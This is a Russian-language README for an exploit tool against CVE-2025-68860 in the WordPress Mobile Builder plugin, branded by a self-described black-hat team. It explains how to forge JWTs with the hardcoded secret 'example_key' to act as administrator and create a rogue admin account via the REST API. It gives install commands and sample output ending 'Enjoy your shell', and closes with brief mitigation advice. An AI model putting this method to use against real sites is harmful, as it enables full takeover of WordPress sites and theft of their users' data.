
Эксплойт-скрипт для CVE-2025-68860, нацеленный на плагин WordPress Mobile Builder. Генерирует поддельные JWT-токены, используя жестко заданный секрет, для аутентификации как администратор и создания новых учетных записей администратора через REST API.
Плагин WordPress Mobile Builder версии 1.4.2 и ниже содержит уязвимость нарушенной аутентификации, которая позволяет злоумышленнику создать действительный JWT-токен с секретным ключом по умолчанию "example_key" и аутентифицироваться как администратор (user_id=1). С помощью этого токена злоумышленник может создать новую учетную запись администратора и захватить сайт.
CVE: CVE-2025-68860
Причина: Использование жестко заданного секретного ключа "example_key" для JWT без надлежащей проверки.
Местонахождение уязвимости: В плагине Mobile Builder файл, обрабатывающий аутентификацию JWT (например, class-jwt-auth.php), использует константу JWT_SECRET со значением по умолчанию 'example_key'. Этот секрет невозможно изменить через настройки, поэтому злоумышленник может создать токен для любого user_id.
Воздействие: Злоумышленник может создать токен для user_id=1 (администратор), получить доступ к конечным точкам REST API и создать нового пользователя с ролью администратора.
CVSS: Высокий (оценка 8.8) - вектор сети, не требует взаимодействия с пользователем.
Скрипт создает JWT-токен с полезной нагрузкой, содержащей user_id: 1 (admin) и секрет "example_key".
Токен используется для доступа к /wp-json/wp/v2/users/ для проверки доступа администратора.
В случае успеха скрипт отправляет POST-запрос к /wp-json/wp/v2/users для создания нового пользователя с именем dedsec1337, паролем admin, email [email protected] и ролью администратора.
Вывод отображает учетные данные и ответ API.
Python 3.6+
Библиотеки: requests, PyJWT, colorama
Целевой WordPress с активным плагином Mobile Builder версии <= 1.4.2.
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║
║ CVE-2025-68860 Priority: HIGH ║
║ Dedsec Team Exploit ║
╚═══════════════════════════════════════════════════════════════════╝
Exploit by : Dedsec Team Exploit
Telegram : @DedsecTeam1337
GitHub : https://github.com/DedsecTeam-BlackHat
[INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication
[INFO] All old exploits/settings are ignored, running this vector only.
Site URL (example: http://target.site): http://localhost/wordpress
[INFO] Generating JWT as admin (user_id=1)...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] Testing JWT at /wp-json/wp/v2/users/me
[SUCCESS] JWT valid! Confirmed admin access.
--------------------------------------------------------------
[INFO] Creating admin account using exploit...
[INFO] Exploiting, please wait...
[SUCCESS] ✅ Admin user created successfully!
==============[ New Admin Credentials ]==============
Username : dedsec1337
Password : admin
Email : [email protected]
===================================================
Full API response:
{
"id": 3,
"username": "dedsec1337",
"name": "dedsec1337",
"email": "[email protected]",
"roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] Exploit finished. Enjoy your shell.
...
Злоумышленник может создать новую учетную запись администратора, получить доступ ко всем функциям WordPress, установить вредоносные плагины, изменить содержимое, украсть данные пользователей или использовать сайт для дальнейших атак.
Эту уязвимость можно эксплуатировать удаленно без предварительной аутентификации.
Воздействие: полная компрометация сайта WordPress.
Немедленно обновите плагин Mobile Builder до последней версии (>=1.4.3).
Если обновление недоступно, временно отключите плагин.
Проверьте, нет ли подозрительных пользователей на вашем сайте.
Используйте брандмауэр веб-приложений (WAF) для блокировки подозрительных запросов к конечным точкам REST API.
В качестве временной меры измените секретный ключ в коде плагина (если возможно) и ограничьте доступ к REST API.